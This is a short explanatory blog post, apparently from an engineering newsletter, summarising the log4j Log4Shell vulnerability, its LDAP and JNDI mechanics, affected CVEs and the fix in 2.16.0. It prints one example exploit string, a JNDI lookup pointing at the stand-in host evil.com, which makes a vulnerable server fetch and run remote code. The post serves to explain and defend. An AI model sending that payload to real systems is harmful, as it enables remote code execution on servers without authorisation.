Short and concise stories, for software engineers.

Join 1,086 other busy engineers

Stay current with a weekly email of bite sized software engineering stories.
jamie@example.com
Subscribe

TL;DR: log4j vulnerability

LDAP & JNDI

Java allows connecting to an LDAP server to retrieve attributes from an object. For example, the URL ldap://server:389/o=Test can be used to find the Test object from any LDAP server. JNDI is a Java feature which allows Java objects to be loaded and used by a Java program during runtime.

Exploitation

log4j implements lookups, meaning you could have written ${env:PWD} and get the PWD environment variable logged. Moreover, JNDI lookup was enabled by default: you could have written ${jndi:ldap://evil.com/} and get the server lookup that URL, then load and execute, using JNDI, the Java object that was returned. Therefore, an attacker can host a malicious Java object and expose it with LDAP to get a nice RCE.

Who is vulnerable?

Applications that use log4j to log input from the user are vulnerable, and log4j is heavily used across the internet. Note that there is currently only one critical vulnerability (CVE-2021-44228) that you should immediately fix. The rest (CVE-2021-4104, CVE-2021-45046) are not that interesting, as they require an attacker to be able to edit configuration files or rely on specific configs. log4j disabled JNDI by default from 2.16.0.